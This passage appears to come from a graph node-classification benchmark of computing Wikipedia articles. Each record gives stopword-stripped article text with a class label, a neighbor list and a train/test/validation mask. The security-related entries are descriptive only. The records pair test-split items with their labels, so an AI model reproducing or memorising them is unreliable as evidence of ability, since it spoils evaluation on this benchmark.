    "text": "Can4linux:can4linux can4linux open source linux-kernel device driver development started mid 1990s philips 82c200 controller stand alone chip isa board at-can-mini 1995 first version created use bus linux laboratory automation project linux lab project fu berlin increasing spread field bus technology automation especially embedded devices growth linux area leads growing importance device drivers base higher layer protocols like canopen j1939 devicenet besides nxp sja1000 successor first supported controller philips 82c200 intel 82527 development powerful microcontrollers integrated controllers capable run linux operating system intensified since 2005 examples development serve freescale coldfire processors arm models atmel freescale also stand-alone controller mcp2515 connected via spi bus br list supported controllers available can4linux project site latest version virtual mode implemented allows applications communicate without hardware using device driver software layer mode already includes support new frame format called fd allows data frame length 64 byte application software opens device descriptor gets back file descriptor using file descriptor standard operating system functions like codice_1 codice_2 used exchange frames nodes bus following code example puts frame bus afterwards waits frame transmitted another node examples available can4linux project site can4linux compiled way allows one process access controller hardware reading writing frames bus beside real application processes like data loggers diagnosis processes access bus",
    "neighbors": [
      5368,
      3467
    ],
    "mask": "Test"
  },
  {
    "node_id": 7453,
    "label": 1,
    "text": "TokuDB:tokudb tokudb open-source high-performance storage engine mysql mariadb achieves using fractal tree index scalable acid mvcc compliant provides indexing-based query improvements offers online schema modifications reduces slave lag hard disk drives flash memory tokudb included percona server mariadb nagios based opmon tokudb uses fractal tree index tree data structure keeps data sorted allows searches sequential access time b-tree insertions deletions asymptotically faster b-tree fractal trees also allow messages injected tree fashion schema changes adding dropping column adding index done online background result indexes maintained without drop performance adding data indexes tends stress performance b-trees performs well fractal tree indexes fractal tree indexes applied number applications characterized near-real time analysis streaming data used storage layer database storage layer file system used database used setting b-tree used improved performance examples include network event management online advertising networks clickstream analytics air traffic control management uses include accelerated crawler performance search engines social media sites also used create indexes columns online enabling query flexibility e-commerce personalization also suited improving performance reducing existing loads transactional websites general performs well applications must simultaneously store log file data execute ad hoc queries approach building memory-efficient systems originally jointly developed researchers massachusetts institute technology rutgers university stony brook university tokudb named one technologies enable big data mysql tokutek startup showcase finalist o'reilly strata conference 2012 big data",
    "neighbors": [
      11392,
      8195,
      10258,
      2456,
      1049,
      1950,
      9503,
      7339,
      9010,
      2810,
      1211,
      10048,
      6721,
      6346,
      5964,
      5198,
      7506,
      9687,
      10459,
      6245,
      8295,
      8683,
      2413,
      7022,
      113,
      3188,
      4598,
      10873,
      7802
    ],
    "mask": "None"
  },
  {
    "node_id": 7454,
    "label": 4,
    "text": "Mixed_threat_attack:mixed threat attack mixed threat attack attack uses different tactics infiltrate computer user environment mixed threat attack might include infected file comes way spam received way internet download mixed threat attacks generally try exploit multiple vulnerabilities get system launching multiple diverse attacks parallel attacker exploit entry points single attack threats based multiple single-attacks much harder detect firewalls help types attacks configured correctly somewhat effective type attack however attack embedded inside application longer able prevent attack typical techniques employed define multiple access threat signature represents identification virus removal software types techniques need employed host machine sometimes firewall intrusion detection system able detect attack",
    "neighbors": [
      612
    ],
    "mask": "Test"
  },
  {
    "node_id": 7455,
    "label": 9,
    "text": "JavaScript_Style_Sheets:javascript style sheets javascript style sheets jsss stylesheet language technology proposed netscape communications corporation 1996 provide facilities defining presentation webpages alternative cascading style sheets css technology although netscape submitted world wide web consortium w3c technology never accepted formal standard never gained much acceptance market netscape communicator 4 supported jsss rival internet explorer web browser choosing implement technology soon netscape communicator release 1997 netscape stopped promoting jsss instead focusing rival css standard also supported internet explorer much wider industry acceptance follow-up netscape communicator netscape 6 released 2000 dropped support jsss remains little historical footnote many web developers even aware existence proposed standard finished using javascript code stylesheet jsss styles individual element modifying properties document.tags object example css equivalent jsss jsss element names case sensitive jsss lacks various css selector features supporting simple tag name class id selectors hand since written using complete programming language stylesheets include highly complex dynamic calculations conditional processing practice however achieved dynamic css using javascript modify stylesheets applicable document runtime jsss often used creation dhtml following example shows part source code html-document style type= text/javascript tags.h1.color red tags.p.fontsize 20pt tags.h3 tags.h2 /style similar cascading style sheets jsss used tag example shows two different methods select tags javascript style sheets supported netscape 4.x 4.0–4.8 later versions web browser ever integrated jsss",
    "neighbors": [
      1409,
      11650,
      259,
      3462,
      6791,
      7943,
      8070,
      10507,
      5907,
      8854,
      4378,
      8605,
      10910,
      4768,
      8994,
      803,
      10791,
      3761,
      11060,
      438,
      5311,
      2880,
      7871,
      9152,
      8262,
      4171,
      11087,
      3921,
      339,
      84,
      4822,
      4056,
      9560,
      603,
      8923,
      4189,
      479,
      4064,
      482,
      5219,
      7396,
      6629,
      10722,
      487,
      488,
      5483,
      4728,
      9195,
      494,
      10991,
      10097,
      10611,
      4213,
      502,
      6775,
      2296,
      10486,
      124,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 7456,
    "label": 2,
    "text": "List_of_Windows_10_Mobile_devices:list windows 10 mobile devices list devices coming natively microsoft windows 10 mobile operating system list also includes devices running two additional flavours windows 10 mobile devices windows 10 mobile enterprise windows 10 iot mobile enterprise devices come sd card support processors supported qualcomm snapdragon 210 212 410 617 800 801 808 810 820 well rockchip rk3288",
    "neighbors": [
      4356,
      11524,
      9863,
      6797,
      782,
      1935,
      4624,
      10388,
      10900,
      11549,
      7970,
      11559,
      1832,
      6827,
      430,
      3890,
      6709,
      8757,
      4289,
      582,
      9033,
      10957,
      4051,
      11221,
      11605,
      9434,
      11103,
      4704,
      10338,
      2788,
      617,
      8681,
      10986,
      7796
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7457,
    "label": 8,
    "text": "Boa_(web_server):boa web server boa discontinued since 2005 open-source small-footprint web server suitable embedded applications originally written paul phillips previously maintained larry doolittle jon nelson slashdot fotolog use boa serve images january 2006 boa following limitations",
    "neighbors": [
      1920,
      4485,
      7430,
      9229,
      7567,
      7695,
      1937,
      11154,
      7443,
      8350,
      3746,
      8994,
      2596,
      3237,
      9125,
      11682,
      7338,
      9387,
      44,
      7983,
      10800,
      11439,
      6714,
      10622,
      1991,
      11134,
      595,
      1363,
      4439,
      3545,
      225,
      1250,
      865,
      2404,
      4837,
      6379,
      5612,
      9580,
      2287,
      11376,
      8691,
      10611,
      11386,
      2045,
      3966
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7458,
    "label": 4,
    "text": "Forensic_corporate_collections:forensic corporate collections forensic corporate collections refer type debt collection recovery tactics apply computer forensics scientific knowledge debt collection process engaging consistently updated computer software debt collection process forensic corporate collection agencies able identify retrieve protect electronic evidence fraud illegal means avoiding debt found computers use evidence case litigation order forensic collections agency used means recovering debt agency must compliant knowledgeable investigation basics federal state local policies standards laws legal processes must also working knowledge types crimes incidents debt deception fraud computing environment types evidence well investigative tools technical training use forensic recovery equipment order effectively recover locate debtors get pay owe client forensic collections agents become adept conversant evidence collection management managing incident scene investigation computer systems disks file structures extracting preserving computer electronic evidence e-mail internet investigations cell phone pda investigations digital footprints debtors invariably leave behind",
    "neighbors": [
      9319
    ],
    "mask": "Test"
  },
  {
    "node_id": 7459,
    "label": 2,
    "text": "TagSpaces:tagspaces tagspaces open-source data manager file navigator helps organize files local drives adding tags files users get user interface manage files different platforms tagspaces compatible windows linux mac android iphone firefox chrome application requires neither internet connection user registration run desktop portable devices tagspaces open source application file navigation data management helps users organize files photos documents local drives file management data associations occur labeling files tags tags may vary color may also differ purpose users create name edit sort group rename delete tags following logic file-tagging process tagspaces compatible currently widespread platforms users access information different devices single user interface responsive design adapts window size proportions device use tagspaces require internet connection access cloud services order run pc portable devices users sync files devices using platforms like google drive dropbox tagspaces requires registration remotely similar file tagging note taking services see similar products basis functionality differs mainly lack database general offline no-cloud vendor lock-in orientation tags added names tagged files example tagging file called “ img-9936.jpg ” tags “ lion ” “ zoo ” renamed “ img-9936 lion zoo .jpg ” tagspaces allows users create edit text markdown rich text html files directly within application firefox chrome versions save currently open webpage local mhtml file containing text pictures formatting enables users view webpage offline classify tags add local file structure supported file types viewing editing tagspaces listed application official documentation page along corresponding platforms alexandre borque reviews tagspaces medium.com independent user ’ cloud local file navigator data manager speculates alternative digital note organizers evernote onenote reviews users also found twitter hashtag tagspaces github repository company official webpage technical writer tatiana kochedykova describes tagspaces valuable instrument educational purposes claims “ tagspaces teachers create organize numerous notes webpages e-books tag group sort prioritize files quickly find necessary one ” tagspaces claims alternative open source world functional similarities note taking file managing data organizing services evernote onenote simplenote pocket picasa",
    "neighbors": [
      9732,
      6797,
      9455,
      5489,
      5078,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 7460,
    "label": 2,
    "text": "UNIX_System_III:unix system iii unix system iii system 3 discontinued version unix operating system released unix support group usg announced system iii late 1981 first released outside bell labs 1982 unix system iii mix various unixes version 7 unix pwb/unix 2.0 cb unix 3.0 unix/rt unix/32v system iii supported dec pdp-11 vax computers system apparently called system iii considered outside release unix/ts 3.0.1 cb unix 3 internally supported bell labs unices manual refers unix release 3.0 unix versions called system system ii official release unix/ts 4.0 would system iv either system iii succeeded system v based unix/ts 5.0 system iii introduced new features named pipes uname system call command run queue also combined various improvements version 7 unix outside organizations however include notable additions made bsd c shell csh screen editing third-party variants system iii include early versions hp-ux irix is/3 pc/ix pc-ux pnx sinix venix xenix",
    "neighbors": [
      640,
      7552,
      2179,
      6787,
      6412,
      4114,
      5397,
      1304,
      3487,
      3488,
      8991,
      7848,
      3241,
      7983,
      3248,
      2995,
      9141,
      823,
      9784,
      1595,
      9151,
      9027,
      10436,
      5831,
      2132,
      11604,
      6369,
      9444,
      8553,
      9452,
      7666,
      2035,
      5492,
      2424,
      633
    ],
    "mask": "Test"
  },
  {
    "node_id": 7461,
    "label": 7,
    "text": "Database-centric_architecture:database-centric architecture database-centric architecture data-centric architecture several distinct meanings generally relating software architectures databases play crucial role often description meant contrast design alternative approach example characterization architecture database-centric may mean combination following",
    "neighbors": [
      1280,
      2432,
      2688,
      7175,
      9481,
      10505,
      10258,
      10518,
      4376,
      2456,
      5658,
      5403,
      9112,
      7968,
      290,
      1314,
      5029,
      8742,
      5550,
      7983,
      5808,
      1841,
      10418,
      1591,
      3768,
      9527,
      3004,
      9661,
      9663,
      4416,
      2369,
      5441,
      11457,
      5956,
      8518,
      72,
      853,
      2901,
      9942,
      9177,
      987,
      860,
      9183,
      11362,
      10340,
      10471,
      8808,
      6383,
      10737,
      9079,
      2681,
      7802,
      9467
    ],
    "mask": "Test"
  },
  {
    "node_id": 7462,
    "label": 9,
    "text": "Translator_(computing):translator computing translator programming language processor generic term could refer compiler assembler interpreter anything converts code one language another include translations high-level human-readable computer languages c++ java intermediate-level languages java bytecode low-level languages assembly language machine code similar levels language different computing platforms well term also used translators software implementations hardware/asic microchip implementations program software descriptions microchip logic gates needed build examples widely used types computer languages translators include interpreters compilers decompilers assemblers disassemblers",
    "neighbors": [
      1409,
      7173,
      2440,
      1552,
      4112,
      10013,
      1952,
      8609,
      5154,
      5677,
      814,
      2620,
      8773,
      6470,
      6477,
      10703,
      3413,
      8280,
      9432,
      477,
      3553,
      6242,
      7780,
      8037,
      10470,
      11625,
      5355,
      5872,
      9714,
      9331,
      2808,
      7164,
      7421
    ],
    "mask": "Test"
  },
  {
    "node_id": 7463,
    "label": 3,
    "text": "Tickless_kernel:tickless kernel tickless kernel operating system kernel timer interrupts occur regular intervals delivered required linux kernel s390 2.6.6 i386 release 2.6.21 configured turn timer tick tickless dynamic tick idle cpus using codice_1 3.10 codice_2 extended non-idle processors codice_3 xnu kernel mac os x 10.4 nt kernel windows 8 also tickless solaris 8 kernel introduced cyclic subsystem allows arbitrary resolution timers tickless operation freebsd 9 introduced dynamic tick mode aka tickless",
    "neighbors": [
      5363,
      3294,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 7464,
    "label": 4,
    "text": "Anomaly_Detection_at_Multiple_Scales:anomaly detection multiple scales anomaly detection multiple scales adams 35 million darpa project designed identify patterns anomalies large data sets darpa information innovation office began 2011 project intended detect prevent insider threats soldier good mental health becoming homicidal suicidal innocent insider becoming malicious government employee nowiki /nowiki nowiki /nowiki abuses access privileges share classified information specific cases mentioned nidal malik hasan wikileaks source chelsea manning commercial applications may include finance intended recipients system output operators counterintelligence agencies proactive discovery insider threats using graph analysis learning part adams project georgia tech team includes noted high-performance computing researcher david a. bader",
    "neighbors": [
      612,
      11473,
      5589,
      7322,
      7741
    ],
    "mask": "Test"
  },
  {
    "node_id": 7465,
    "label": 4,
    "text": "Astalavista.box.sk:astalavista.box.sk astalavista.box.sk founded 1994 one first search engines computer security information practice turned used search engine security exploits software hacking cracking different keygenerators software cracks site also known referencing things spyware viruses website known possibly contain data links downloadable files information users would consider spyware adware unwanted programs astalavista.box.sk hosted slovakia astalavista pun spanish phrase said terminator hasta la vista baby meaning see later baby 90 web search engine altavista note altavista 1995 astalavista 1994 astalavista also used refer computer security related websites like astalavista security group",
    "neighbors": [
      6916,
      877,
      10392,
      7739,
      4956,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 7466,
    "label": 9,
    "text": "CS-4_(programming_language):cs-4 programming language cs-4 programming language operating system interface developed early 1970s intermetrics cambridge massachusetts first published manual released december 1973 entitled cs-4 language reference manual operating system interface document three parts cs-4 base language capabilities cs-4 operating system interface overview full cs-4 capabilities little known cs-4 language developed united states navy 1970s ongoing research project continuing study extensibility abstraction techniques develop requirement language simple compact language first documented 1973 miller et al. revised 1975 allow data abstractions powerful extension facilities",
    "neighbors": [
      8262
    ],
    "mask": "Test"
  },
  {
    "node_id": 7467,
    "label": 4,
    "text": "Open_Vulnerability_and_Assessment_Language:open vulnerability assessment language open vulnerability assessment language oval international information security community standard promote open publicly available security content standardize transfer information across entire spectrum security tools services oval includes language used encode system details assortment content repositories held throughout community language standardizes three main steps assessment process repositories collections publicly available open content utilize language oval community developed three schemas written extensible markup language xml serve framework vocabulary oval language schemas correspond three steps assessment process oval system characteristics schema representing system information oval definition schema expressing specific machine state oval results schema reporting results assessment content written oval language located one many repositories found within community one repository known oval repository hosted mitre corporation central meeting place oval community discuss analyze store disseminate oval definitions definition oval repository determines whether specified software vulnerability configuration issue program patch present system information security community contributes development oval participating creation oval language oval developers forum writing definitions oval repository oval community forum oval board consisting representatives broad spectrum industry academia government organizations around world oversees approves oval language monitors posting definitions hosted oval web site means oval funded us-cert u.s. department homeland security benefit community reflects insights combined expertise broadest possible collection security system administration professionals worldwide oval used security content automation protocol scap oval language standardizes three main steps assessment process representing configuration information systems testing analyzing system presence specified machine state vulnerability configuration patch state etc reporting results assessment oval interpreter freely available reference implementation created show data collected computer testing based set oval definitions evaluated determine results definition oval interpreter demonstrates usability oval definitions used definition writers ensure correct syntax adherence oval language development draft definitions fully functional scanning tool simplistic user interface running oval interpreter provide list result values evaluated definition oval repository central meeting place oval community discuss analyze store disseminate oval definitions repositories community also host oval content include oval system characteristics files oval results files well definitions oval repository contains community-developed oval vulnerability compliance inventory patch definitions supported operating systems definitions free use implement information security products services oval repository top contributor award program grants awards quarterly basis top contributors oval repository repository community effort contributions new content modifications instrumental success awards serve public recognition organization ’ support oval repository incentive others contribute organizations receiving award also receive oval repository top contributor logo indicating quarter award e.g. 1st quarter 2007 may used see fit awards granted organizations made significant contribution new modified content quarter oval board advisory body provides valuable input oval moderator currently mitre important organizational support oval individuals sit oval board input activity truly make difference board ’ primary responsibilities work moderator community define oval provide input oval ’ strategic direction advocate oval community",
    "neighbors": [
      3086,
      4081,
      2709,
      635,
      479
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7468,
    "label": 9,
    "text": "Divergence_(computer_science):divergence computer science computer science computation said diverge terminate terminates unobservable exceptional state otherwise said converge domains computations expected infinite process calculi computation said diverge fails productive always produces action within finite amount time various subfields computer science use varying mathematically precise definitions means computation converge diverge abstract rewriting abstract rewriting system called convergent confluent terminating notation ↓ n means reduces normal form n zero reductions ↓ means reduces normal form zero reductions ↑ means reduce normal form latter impossible terminating rewriting system lambda calculus expression divergent normal form denotational semantics object function f → b modelled mathematical function formula_1 ⊥ bottom indicates object function argument diverges calculus communicating sequential processes divergence drastic situation process performs endless series hidden actions example consider following process defined csp notation traces process defined consider following process conceals tick event clock process definition p called divergent process",
    "neighbors": [
      1936,
      7468
    ],
    "mask": "Test"
  },
  {
    "node_id": 7469,
    "label": 8,
    "text": "Cadec-online.com:cadec-online.com cadec-online.com multilingual web application performs analysis composite materials used primarily teaching especially within disciplines aerospace engineering materials science naval engineering mechanical engineering civil engineering users navigate application tree view structures component chapters cadec-online engineering cloud application uses latex library render equations symbols sprites optimize delivery images page cadec-online.com implements micromechanics composites reinforced unidirectional fibers random fibers well plain weave twill satin textiles predicts lamina elastic moduli strength values coefficient thermal expansion cte moisture expansion micromechanical properties application conducts analysis several theoretical models including cadec-online.com calculate three-dimensional 3d stiffness compliance matrices two-dimensional 2d reduced stiffness compliance matrices lamina coordinate system cs also capable transforming composite laminates matrices coordinate system lamina types supported software include application carry laminate analyses including calculation laminate stiffness stress strain failure software supports intact damaged laminates see damage mechanics category cadec-online.com calculate laminate thermal stresses laminate coefficient thermal expansion laminate stiffness compliance matrices composite laminates also application predict laminate moduli orthotropic material equivalents stiffness laminate bending membrane modes deformation cadec-online.com predicts failures first ply failure fpf last ply failure lpf mechanical thermal moisture loads well situ effects using several failure criteria fc including uses discrete damage mechanics ddm predict crack density vs. strain symmetric laminate subjected membrane state strain results exported excel plotting state variable describing damage state material crack density ply thermodynamic force midsurface strain applied laminate relevant material properties fracture toughnesses modes opening ii shear ply application predict stiffness strength composite materials reinforced plain weave twill satin textile also called fabric textile lamina idealized transversely isotropic material calculated textile lamina used lamina rest application calculated properties include application able analyze laminated composite thin walled beams general cross sections beams asymmetric loaded general combinations forces three planes axial vertical horizontal well three moments torque two bending moments cadec-online.com computes section properties shear center cadec-online.com defines four different types loads cadec-online.com features api allows users access virtually capabilities present web version software software environments abaqus ansys matlab python .net framework mathematica etc",
    "neighbors": [
      3960,
      4194,
      3573,
      8554
    ],
    "mask": "None"
  },
  {
    "node_id": 7470,
    "label": 2,
    "text": "Desktop_wars:desktop wars desktop wars may refer",
    "neighbors": [
      576,
      6352,
      8092,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 7471,
    "label": 3,
    "text": "MMIX:mmix mmix pronounced em-mix 64-bit reduced instruction set computing risc architecture designed donald knuth significant contributions john l. hennessy contributed design mips architecture richard l. sites architect alpha architecture knuth said mmix computer intended illustrate machine-level aspects programming books art computer programming replaces mix 1960s-style machine formerly played role… strove design mmix machine language would simple elegant easy learn time careful include complexities needed achieve high performance practice mmix could principle built even perhaps competitive fastest general-purpose computers marketplace mmix big-endian 64-bit reduced instruction set computer risc 256 64-bit general-purpose registers 32 64-bit special-purpose registers fixed-length 32-bit instructions 64-bit virtual address space mmix instruction set comprises 256 opcodes one reserved future expansion mmix uses ieee 754 floating-point numbers instructions associated mnemonic example instruction 20 32 associated add instructions symbolic form op x z op specifies sort instruction x specifies register used store result instruction rest specify operands instruction fields eight bits wide example add 0 1,3 means set 0 sum 1 3 instructions take either immediate values register contents thus single instruction mnemonic may correspond one two opcodes mmix programs typically constructed using mmixal assembly language simple mmixal program prints string hello world 256 directly addressable general-purpose architectural registers mmix chip designated 0 255 32 special-purpose architectural registers special-purpose registers accessed get put instructions two special registers rl rg determine general registers local global registers 0 ... local registers represent window internal stack registers registers rl ... marginal registers always return 0 used source operation using marginal register destination operation cause machine automatically increase rl include register registers rg ... 255 called global registers part register stack local register stack provides subroutine rl local registers designated 0 whenever subroutine called number local registers pushed stack shifting start window arguments called subroutine left remaining local registers subroutine finishes pops previously pushed registers internal stack contain finite number registers may necessary store part stack memory implemented special registers ro rs record part local register stack memory part still local physical registers register stack provides fast subroutine linkage 32 special physical architectural registers follows like programs running almost cpus mmix programs interrupted several ways external hardware timers common source preemption computing interrupts many instructions cause interrupts certain exceptional cases memory protection page fault exceptions used implement virtual memory floating point exception handling mmix 2 kinds interrupts trips traps main difference trips traps traps send control trap handler program operating system trapping trips send control trip handler program user application tripping users also force interrupt handler run explicit software interrupt instructions trip trap similar kinds trap computer systems particular system call user program operating system uses trap instruction known hardware implementations mmix instruction set architecture exist however fpgammix project implements mmix verilog making possible implement using field-programmable gate array mmix instruction set architecture supported number software tools computer architecture research software development gnu compiler collection includes mmix back-end c/c++ compilers contributed hans-peter nilsson part main gcc distribution since late 2001. mmix back-end gcc continues actively developed maintained volunteers tools could theoretically used compile build bootstrap entire freebsd linux similar operating system kernel onto mmix hardware hardware exist",
    "neighbors": [
      898,
      8450,
      1798,
      3615,
      10786,
      10796,
      3886,
      9391,
      823,
      9911,
      7234,
      3142,
      6087,
      5065,
      9932,
      4561,
      5457,
      3197,
      7770,
      219,
      2653,
      477,
      8551,
      2798,
      11125,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7472,
    "label": 4,
    "text": "GadgetTrak:gadgettrak gadgettrak company based portland oregon develops theft recovery data protection software name company founded february 2007 ken westin launch first theft recovery product usb mass storage devices tracked stolen devices including ipods flash drives digital cameras devices connected computer company issued patent technology february 24 2009 gadgettrak technology featured special segment dateline ipod theft tracked stolen ipods confronted thieves customized version technology embedded flir thermal imaging cameras part exclusive licensing agreement name thermatrak utilized theft recovery well export controls company issued two patents groundbreaking technologies patent 9,083,624 applies process tracking lost stolen computing devices use wi-fi and/or gps and/or cellular triangulation patent 7,496,201 applies process tracking recovering devices ipods flash drives digital cameras windows blackberry october 2008 company launched gadgettrak mobile security app blackberry windows mobile devices apple iphones november 4 2008 company launched first mobile security software app apple iphone year half apple launched find iphone android devices ces 2012 company launched version gadgettrak mobile security android devices along android release upgrades added including web based control panel activate tracking remotely wipe data device encrypt backup data well enterprise group management console launch application put test chain sprint stores installed software demo units one store tigard oregon several devices stolen help gadgettrak mobile security app able recover devices apprehend thieves mac laptops november 12 2008 company launched mac laptop version software utilizes web camera capture photo thief well utilization wi-fi positioning provide location within 10–20 meters shortly product launch number stolen laptop recoveries using software first brooklyn new york stolen imac tracked tattoo parlor police recovered stolen computer along stolen property windows laptops april 2009 company launched windows version laptop software expanding product offering gadgettrak claims many firsts regards devices recovered methods used",
    "neighbors": [
      10470,
      5677,
      6797,
      7983,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 7473,
    "label": 4,
    "text": "MSAV:msav microsoft anti-virus msav antivirus program introduced microsoft ms-dos operating system program first appeared ms-dos version 6.0 last appeared ms-dos 6.22 first version antivirus program basic inbuilt update facility updates obtained bbs manually installed user could scan 1,234 different viruses microsoft anti-virus windows mwav included part package front end allowed msav run properly windows 3.1x microsoft anti-virus supplied central point software inc. later acquired symantec 1994 integrated symantec norton antivirus product stripped version central point anti-virus cpav product central point software inc. licensed carmel software engineering haifa israel carmel software sold product turbo anti-virus domestically abroad microsoft anti-virus windows also provided central point software msav featured detect clean strategy detection boot sector trojan horse-type viruses typical virus problems time program also anti-stealth check sum feature could used detect changes normal files technology intended make unavailability regular update packages final update msav released june 1996 symantec update added ability detect polymorphic viruses virus definitions updated scan total 2,371 viruses vsafe terminate stay resident component msav provided real-time virus protection default vsafe following features enabled vsafe vsafe number virus definitions embedded within executable capable loading additional signatures updates external definition file",
    "neighbors": [
      5380,
      2309,
      1417,
      2443,
      537,
      3482,
      2213,
      5799,
      5673,
      3885,
      7983,
      5057,
      10828,
      9166,
      5082,
      9695,
      3935,
      9569,
      4464,
      11248,
      6643
    ],
    "mask": "Test"
  },
  {
    "node_id": 7474,
    "label": 4,
    "text": "National_Infrastructure_Security_Co-ordination_Centre:national infrastructure security co-ordination centre national infrastructure security co-ordination centre niscc inter-departmental centre uk government set 1999 role niscc pronounced nicey minimise risk critical national infrastructure cni electronic attack niscc provided advice information computer network defence information assurance issues 1 february 2007 niscc merged national security advice centre nsac form centre protection national infrastructure cpni cpni provides integrated combining information personnel physical security advice businesses organisations make national infrastructure delivery advice protect uk national security helping reduce vulnerability national infrastructure terrorism threats",
    "neighbors": [
      9281,
      4081
    ],
    "mask": "None"
  },
  {
    "node_id": 7475,
    "label": 8,
    "text": "DataNucleus:datanucleus datanucleus formerly known java persistent objects jpox open source project apache 2 license provides software products around data management java datanucleus project started 2008 jpox project started 2003 relaunched datanucleus 2008 broader scope datanucleus access platform fully compliant implementation java data objects jdo 1.0 2.0 2.1 2.2 3.0 3.1 3.2 specifications jsr 0012 jsr 0243 java persistence api jpa 1.0 2.0 2.1 2.2 specifications jsr 0220 jsr 0317 jsr 0338 providing transparent persistence java objects supports persistence widest range datastores java persistence software supporting main object-relational mapping orm patterns allows querying using either jdoql jpql sql comes byte-code enhancer allows persistence relational datastores rdbms object-based datastores db4o neodatis odb document-based storage xml excel opendocument spreadsheets web-based storage json google storage amazon simple storage service map-based datastores hbase google bigtable apache cassandra graph-based datastores neo4j document stores mongodb well types datastores e.g ldap plugins osgi-compliant used equally osgi environment datanucleus access platform also utilised persistence layer behind google app engine java vmforce cloud offering salesforce.com vmware",
    "neighbors": [
      5987,
      1222,
      3080,
      7742,
      7816,
      10090,
      6860,
      5677,
      10413,
      10193,
      3763,
      5047,
      9467,
      7485,
      3710,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 7476,
    "label": 4,
    "text": "KidGuard:kidguard kidguard parental monitoring application ios android mobile phones application uses proprietary software help parents monitor children ’ text messages browser history social media activity stored videos photos emails phone gps location kidguard developed los angeles-based team officially released 2016 kidguard launch application received coverage abc news inc. magazine 2017 kidguard partnered startup incubator onramp lab located taipei taiwan year international security consultant gene yu joined kidguard advisory board aid kidnapping response prevention measures following software service model kidguard run web application allows parent view activity child phone including kidguard also includes feature calls situation 360 report application automatically creates report aid law enforcement event child disappearance report includes full profile child recent locations behavior message history critics raised concerns potential capability kidguard competitors violate privacy laws used tool stalkers abusers may 2018 kidguard featured new york times article criticized application developers running advertisements aimed adults attempting spy spouses discover infidelity kidguard contacted comment spokesman responded advertisements developed marketing partner content relating infidelity subsequently removed kidguard website kidguard maintains annual kidguard education essay scholarship high school students united states scholarship awarded undisclosed number participants based results essay content whose topics concern online safety cyberbullying 2017 kidguard donated 25,000 grants 18 non-profit organizations focused child safety online threat prevention largest grant 5,000 awarded megan meier foundation",
    "neighbors": [
      467,
      7983
    ],
    "mask": "Train"
  },
  {
    "node_id": 7477,
    "label": 2,
    "text": "CP-67:cp-67 cp-67 control program portion cp/cms virtual machine operating system developed ibm system/360-67 ibm cambridge scientific center reimplementation earlier research system cp-40 ran one-off customized s/360-40 cp-67 later reimplemented cp-370 ibm released vm/370 1972 virtual memory added system/370 series details development circumstances cp-67 found article history cp/cms",
    "neighbors": [
      6675,
      7187,
      10776,
      25,
      4637,
      9762,
      5158,
      7217,
      10803,
      7733,
      9784,
      10809,
      573,
      576,
      10333,
      97,
      9829,
      6248,
      8298,
      6772,
      7285,
      9335,
      2168,
      1147,
      2172,
      3197,
      1150,
      2179,
      10883,
      6797,
      9361,
      9366,
      6296,
      9370,
      7325,
      9887,
      8879,
      3248,
      6837,
      1219,
      8388,
      6342,
      8393,
      9932,
      5840,
      1235,
      7382,
      8410,
      1253,
      5363,
      2811,
      3323,
      2813,
      9468,
      10499,
      1804,
      10508,
      273,
      11539,
      789,
      3359,
      10016,
      2345,
      1323,
      7983,
      823,
      10040,
      4409,
      7483,
      8509,
      11075,
      4423,
      5457,
      11601,
      7507,
      10590,
      863,
      868,
      3429,
      8551,
      5492,
      8063,
      6529,
      4996,
      394,
      3978,
      7053,
      7057,
      11667,
      11673,
      8092,
      6557,
      421,
      11184,
      5562,
      6075,
      6078,
      9151,
      8136,
      6128,
      5619,
      10235
    ],
    "mask": "None"
  },
  {
    "node_id": 7478,
    "label": 5,
    "text": "Generic_Framing_Procedure:generic framing procedure generic framing procedure gfp multiplexing technique defined itu-t g.7041 allows mapping variable length higher-layer client signals circuit switched transport network like otn sdh/sonet pdh client signals protocol data unit pdu oriented like ip/ppp ethernet media access control block-code oriented like fibre channel two modes gfp generic framing procedure framed gfp-f generic framing procedure transparent gfp-t gfp utilizes length/hec-based frame delineation mechanism robust used high-level data link control hdlc single octet flag based two types gfp frames gfp client frame gfp control frame gfp client frame classified either client data frame client management frame former used transport client data latter used transport point-to-point management information like loss signal etc client management frames differentiated client data frames based payload type indicator gfp control frame currently consists core header field payload area frame used compensate gaps client signal transport medium higher capacity client signal better known idle frame gfp frame consists",
    "neighbors": [
      9860,
      3847,
      1297,
      8989,
      2206,
      2994,
      7865,
      10558,
      4543,
      11332,
      5472,
      1893,
      4202,
      2668,
      7407,
      8432,
      5875,
      5118,
      2431
    ],
    "mask": "None"
  },
  {
    "node_id": 7479,
    "label": 9,
    "text": "Comparison_of_Pascal_and_C:comparison pascal c computer programming languages c pascal similar times origin influences purposes used design compile compilers early lifetimes original pascal definition appeared 1969 first compiler 1970 first version c appeared 1972 descendants algol language series algol introduced programming language support structured programming programs constructed single entry single exit constructs case pascal stems directly algol w shared new ideas algol 68 c language indirectly related algol originally b bcpl cpl later algol 68 example case codice_1 codice_2 also pascal example case enumerations codice_3 codice_4 booleans pascal dialects also incorporated traits c. documented pascal niklaus wirth standardized iso 7185 1982 c documented language brian kernighan dennis ritchie standardized 1989 reason versions represent mature version language also comparatively close time ansi c c99 later c standards features features later implementations pascal turbo pascal free pascal included comparison despite improvements robustness functionality conferred syntactically pascal much algol-like c. english keywords retained c uses punctuation symbols – pascal codice_5 codice_6 codice_7 c uses codice_8 codice_9 codice_10 example however c actually algol-like pascal regarding simple declarations retaining type-name variable-name syntax example c accept declarations start block outer block function another subtle difference role semicolon pascal semicolons separate individual statements within compound statement whereas terminate statement c. also syntactically part statement c transforming expression statement difference manifests primarily two situations superfluous semicolon put last line end thereby formally inserting empty statement traditional c codice_14 supported certain pascal dialects like midletpascal traditional pascal codice_15 codice_16 modern pascal like object pascal delphi fpc well modern c implementations allow c++ style comments codice_17 c pascal differ interpretation upper lower case c case sensitive pascal thus codice_18 codice_19 distinct names c identical pascal languages identifiers consist letters digits rule first character may digit c underscore counts letter even _abc valid name names leading underscore often used differentiate special system identifiers 